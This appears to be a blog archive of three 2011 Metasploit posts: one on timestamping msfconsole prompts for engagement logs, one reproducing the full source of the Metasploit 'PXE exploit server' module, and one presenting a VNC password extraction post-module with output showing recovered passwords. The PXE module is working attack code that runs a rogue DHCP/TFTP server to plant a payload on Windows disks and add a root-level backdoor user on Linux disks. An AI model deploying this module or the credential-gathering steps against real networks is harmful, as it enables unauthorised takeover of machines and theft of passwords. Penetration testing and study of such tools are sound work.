3 posts tagged 'MSF'

  1. 2011.10.11 MSFConsole Prompt Fiddling
  2. 2011.08.08 PXE exploit server
  3. 2011.03.21 Metasploit VNC Password Extraction
2011.10.11 19:11

MSFConsole Prompt Fiddling

In @carnal0wnage's and my presentation at DerbyCon 2011 we talked about using SCREEN and SCRIPT to keep connections live, use them across SSH sessions, and log everything that happens. What we didn't cover is the fact that there isn't a time stamp in those logs. Now, Metasploit has multiple ways of creating logs:

cat ~/.msf4/logs/framework.log
This log automatically captures all of the error data, which is great for troubleshooting when something isn't working, but it doesn't record what you are doing inside of msfconsole.

msf> spool ~/myclient.log
The spool command is great for logging output from anything you do in either consoles or sessions, even when you drop to a shell. My one gripe about this one is that it doesn't log the actual command you issued.

msf> set ConsoleLogging true
msf> set LogLevel 5
msf> set SessionLogging true
msf> set TimestampOutput true
These combined essentially do the same thing as spool, except that they go into different logs and do actually log the command you issued.

 

Plenty of logging, right? But none of them really 'log everything', and time stamps are not a regular occurrence in them. Cool, but we need both. We've got the 'log everything' part with the Linux 'script' command; we just need a way to inject time stamps into our log.

Enter the ever mutable 'msf>' prompt:


A lesser-known variable in msfconsole is 'PROMPT'. You can set it much like a shell prompt in any OS, but there are some Metasploit-specific things you can add. Using a three-letter abbreviation you can even add color to it.

For example, let's add our hostname to our prompt:

  • set PROMPT %H

changes msf> to myattackmachine>

And you can combine and add things that you wish:

  • set PROMPT %H Just more text %U

changes the prompt to: myattackmachine Just more text mubix> (%U is the username)

For reference here are the other working % variables that I know of:

  • %D = Current local directory (not sure if this changes when in meterpreter or not for the victims dir, that would be cool)
  • %H = Host name (again, would be cool if this changed when in meterpreter)
  • %J = Current number of jobs running
  • %L = Local IP (makes it easy to remember what to put in LHOST)
  • %S = Current number of sessions open
  • %T = Time stamp
  • %U = Username (yes, would be awesome if this changed in meterpreter too)

Now, if you wanted to add colors to that, all you would do is use something like %grn%T to make the time stamp green. You'll have to play around with the color names as I don't know them all: %red %blu %blk etc...

Combine all of that with script and you've got something awesome. I set my PROMPT to:

  • set PROMPT %T S:%S J:%J
  • 1970-01-01 00:00:00 +0000 S:0 J:0> 

This gives me the number of jobs and sessions and has the time stamp every time I throw a command, so in my logs I can very easily narrow down the exact time when I did or didn't do something. The number of sessions and jobs are just good-to-know items.

Throw in one more trick to make the whole thing a cake walk:

In your ~/.msf4 directory, if you haven't already, create a file called 'msfconsole.rc'. This magical file will run every time you start msfconsole (with the express exception of when you specify a resource file to run from the command line using the -r argument). Throw your 'set PROMPT %blah %blah %blah' in there formatted however you like, and now whenever you start msfconsole you'll have your handy dandy timestamp.
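As an added example (not code from the original post), here is a small Python script that turns a `script` typescript of an msfconsole session run with the prompt above into a UTC command timeline: it strips the ANSI color codes a %grn-style prompt leaves in the log and the carriage returns `script` records, then pulls the %T timestamp, session count, job count and command out of each prompt line. The log sample is constructed for the example.

```python
import re
from datetime import datetime, timezone

# Constructed sample of what `script` captures when msfconsole runs with
# `set PROMPT %T S:%S J:%J`: one prompt carries an ANSI color sequence (as
# %grn%T would emit) and lines end in the CR that `script` records.
SAMPLE_LOG = (
    "Script started on Tue 11 Oct 2011 07:11:02 PM EDT\n"
    "2011-10-11 19:11:05 -0400 S:0 J:0> use exploit/multi/handler\r\n"
    "2011-10-11 19:11:09 -0400 S:0 J:0> set PAYLOAD windows/meterpreter/reverse_tcp\r\n"
    "PAYLOAD => windows/meterpreter/reverse_tcp\r\n"
    "2011-10-11 19:11:20 -0400 S:0 J:0> exploit -j\r\n"
    "[*] Exploit running as background job.\r\n"
    "\x1b[32m2011-10-11 19:12:41 -0400\x1b[0m S:1 J:1> sessions -l\r\n"
    "2011-10-11 19:13:02 -0400 S:1 J:1> \r\n"
    "Script done on Tue 11 Oct 2011 07:13:10 PM EDT\n"
)

ANSI_RE = re.compile(r"\x1b\[[0-9;]*[A-Za-z]")
# %T renders like Ruby's Time#to_s: "YYYY-MM-DD HH:MM:SS +ZZZZ"
PROMPT_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2} [+-]\d{4}) "
    r"S:(?P<sessions>\d+) J:(?P<jobs>\d+)> ?(?P<cmd>.*)$"
)

def parse_script_log(text):
    """One dict per command typed at a timestamped prompt.
    Bare-Enter prompts are skipped; timestamps keep their UTC offset."""
    entries = []
    for raw in text.splitlines():
        line = ANSI_RE.sub("", raw).rstrip("\r")   # strip colors and CRs
        m = PROMPT_RE.match(line)
        if not m or not m.group("cmd").strip():
            continue
        entries.append({
            "ts": datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S %z"),
            "sessions": int(m.group("sessions")),
            "jobs": int(m.group("jobs")),
            "cmd": m.group("cmd").strip(),
        })
    return entries

def timeline_utc(text):
    """Report lines with every timestamp normalised to UTC."""
    out = []
    for e in parse_script_log(text):
        utc = e["ts"].astimezone(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
        out.append("%s  S:%d J:%d  %s" % (utc, e["sessions"], e["jobs"], e["cmd"]))
    return out
```

Run `timeline_utc(open("typescript").read())` on a real `script` capture to get the same report for an engagement log.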

Shout out to @egyp7 for showing me this.



Source: Room362.com

2011.08.08 18:54

PXE exploit server

##
# $Id: pxexploit.rb 13493 2011-08-05 17:10:27Z scriptjunkie $
##
  
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
  
require 'msf/core'
require 'rex/proto/tftp'
require 'rex/proto/dhcp'
  
class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking
  
    include Msf::Exploit::Remote::TFTPServer
  
    def initialize
        super(
            'Name'        => 'PXE exploit server',
            'Version'     => '$Revision: 13493 $',
            'Description'    => %q{
                This module provides a PXE server, running a DHCP and TFTP server.
                The default configuration loads a linux kernel and initrd into memory that
                reads the hard drive, placing the payload on the hard drive of any Windows
                partition seen, and adding a uid 0 user with username and password metasploit to any
                linux partition seen.
            },
            'Author'      => [ 'scriptjunkie' ],
            'License'     => MSF_LICENSE,
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'process',
                },
            'Payload'        =>
                {
                    'Space'       => 4500,
                    'DisableNops' => 'True',
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    [ 'Windows Universal', {} ],
                ],
            'Privileged'     => true,
            'Stance' => Msf::Exploit::Stance::Passive,
            'DefaultTarget'  => 0
        )

        register_options(
            [
                OptInt.new('SESSION',   [ false, 'A session to pivot the attack through' ])
            ], self.class)

        register_advanced_options(
            [
                OptString.new('TFTPROOT',   [ false, 'The TFTP root directory to serve files from' ]),
                OptString.new('SRVHOST',   [ false, 'The IP of the DHCP server' ]),
                OptString.new('NETMASK',   [ false, 'The netmask of the local subnet', '255.255.255.0' ]),
                OptString.new('DHCPIPSTART',   [ false, 'The first IP to give out' ]),
                OptString.new('DHCPIPEND',   [ false, 'The last IP to give out' ])
            ], self.class)
    end
  
    def exploit
        if not datastore['TFTPROOT']
            datastore['TFTPROOT'] = File.join(Msf::Config.data_directory, 'exploits', 'pxexploit')
        end
        datastore['FILENAME'] = "update1"
        datastore['SERVEONCE'] = true # once they reboot; don't infect again - you'll kill them!
  
        # Prepare payload
        print_status("Creating initrd")
        initrd = IO.read(File.join(Msf::Config.data_directory, 'exploits', 'pxexploit','updatecustom'))
        uncompressed = Rex::Text.ungzip(initrd)
        payl = payload.generate
        uncompressed[uncompressed.index('AAAAAAAAAAAAAAAAAAAAAA'),payl.length] = payl
        initrd = Rex::Text.gzip(uncompressed)
  
        # Meterpreter attack
        if framework.sessions.include? datastore['SESSION']
            client = framework.sessions[datastore['SESSION']]
            if not client.lanattacks
                print_status("Loading lanattacks extension...")
                client.core.use("lanattacks")
            end
  
            print_status("Loading DHCP options...")
            client.lanattacks.load_dhcp_options(datastore)
            1.upto(4) do |i|
                print_status("Loading file #{i} of 4")
                if i < 4
                    contents = IO.read(::File.join(datastore['TFTPROOT'],"update#{i}"))
                else
                    contents = initrd
                end
                client.lanattacks.add_tftp_file("update#{i}",contents)
            end
            print_status("Starting TFTP server...")
            client.lanattacks.start_tftp
            print_status("Starting DHCP server...")
            client.lanattacks.start_dhcp
            print_status("pxesploit attack started")
            return
        end
  
        # normal attack
        print_status("Starting TFTP server...")
        @tftp = Rex::Proto::TFTP::Server.new
        @tftp.set_tftproot(datastore['TFTPROOT'])
        @tftp.register_file('update4',initrd)
        @tftp.start
  
        print_status("Starting DHCP server...")
        @dhcp = Rex::Proto::DHCP::Server.new( datastore )
        @dhcp.start
        print_status("pxesploit attack started")
  
        # Wait for finish..
        @tftp.thread.join
        @dhcp.thread.join
        print_status("pxesploit attack completed")
    end
  
end


Source: exploit-db.com

2011.03.21 19:36

Metasploit VNC Password Extraction

Chris Gates wrote a blog post about the 'getvncpw' meterpreter script. I ran into the same issue on Penetration Tests in the past but didn't know much about the wacked out version of DES that RFB (the VNC protocol) was using. Not being a fan of manually editing a binary and compiling each time I had a password to crack I wanted to find another way, but didn't get a chance to.

Yesterday I saw this ticket: https://www.metasploit.com/redmine/issues/3183 and thought to myself: "That's definitely within my coding ability to contribute a patch for". After almost 15 hours of coding between 9 pm on Saturday and 8 pm on Sunday, it went far beyond just adding in a bit of code to support UltraVNC.

changelog:

  • Complete rewrite as a post module instead of a meterpreter script
  • Passwords of less than 8 characters are correctly padded (thanks jduck)
  • UltraVNC checks added
  • TightVNC checks added for both VNC and its control console
  • Made it very simple to add new checks in either the registry or in a file
  • Output is a bit more verbose (lets you know something is happening)
  • Reports authentication credentials found to database
  • Identifies the port that VNC is running on as well

It isn't in the Metasploit trunk, so until/if it gets added you can get it here:

http://www.room362.com/scripts-and-programs/metasploit/enum_vnc_pw.rb

If you have a check, find it breaks for some reason or another, or just want to tell me that I suck, please leave a comment or email me.

Here it is in action against my VM with 3 different VNC servers on it (calling the post module in two separate ways):

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: XPBASELINE\Administrator
meterpreter > background
msf exploit(handler) > use post/windows/gather/enum_vnc_pw 
msf post(enum_vnc_pw) > set SESSION 1
SESSION => 1
msf post(enum_vnc_pw) > show options

Module options (post/windows/gather/enum_vnc_pw):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.

msf post(enum_vnc_pw) > run

[*] Enumerating VNC passwords on XPBASELINE
[*] Checking UltraVNC...
[+] UltraVNC => A85B4C5976979DE93B => thisismy on port: 5900
[+] VIEW ONLY: UltraVNC => DE2C1BA7393F6708B3 => 111 on port: 5900
[*] Checking WinVNC3_HKLM...
[*] Checking WinVNC3_HKCU...
[*] Checking WinVNC3_HKLM_Default...
[*] Checking WinVNC3_HKCU_Default...
[*] Checking WinVNC_HKLM_Default...
[*] Checking WinVNC_HKCU_Default...
[*] Checking WinVNC4_HKLM...
[+] WinVNC4_HKLM => c777b2de337a91cf => mypasswo on port: 5900
[*] Checking WinVNC4_HKCU...
[*] Checking RealVNC_HKLM...
[*] Checking RealVNC_HKCU...
[*] Checking TightVNC_HKLM...
[+] TightVNC_HKLM => 7ebf1e76f732459f => authpass on port: 5900
[*] Checking TightVNC_HKLM_Control_pass...
[+] TightVNC_HKLM_Control_pass => f0299fd0e927cf2f => adminpas on port: 5900
[*] Post module execution completed

msf post(enum_vnc_pw) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > run post/windows/gather/enum_vnc_pw 

[*] Enumerating VNC passwords on XPBASELINE
[*] Checking UltraVNC...
[+] UltraVNC => A85B4C5976979DE93B => thisismy on port: 5900
[+] VIEW ONLY: UltraVNC => DE2C1BA7393F6708B3 => 111 on port: 5900
[*] Checking WinVNC3_HKLM...
[*] Checking WinVNC3_HKCU...
[*] Checking WinVNC3_HKLM_Default...
[*] Checking WinVNC3_HKCU_Default...
[*] Checking WinVNC_HKLM_Default...
[*] Checking WinVNC_HKCU_Default...
[*] Checking WinVNC4_HKLM...
[+] WinVNC4_HKLM => c777b2de337a91cf => mypasswo on port: 5900
[*] Checking WinVNC4_HKCU...
[*] Checking RealVNC_HKLM...
[*] Checking RealVNC_HKCU...
[*] Checking TightVNC_HKLM...
[+] TightVNC_HKLM => 7ebf1e76f732459f => authpass on port: 5900
[*] Checking TightVNC_HKLM_Control_pass...
[+] TightVNC_HKLM_Control_pass => f0299fd0e927cf2f => adminpas on port: 5900
meterpreter > 


Source: http://www.room362.com/
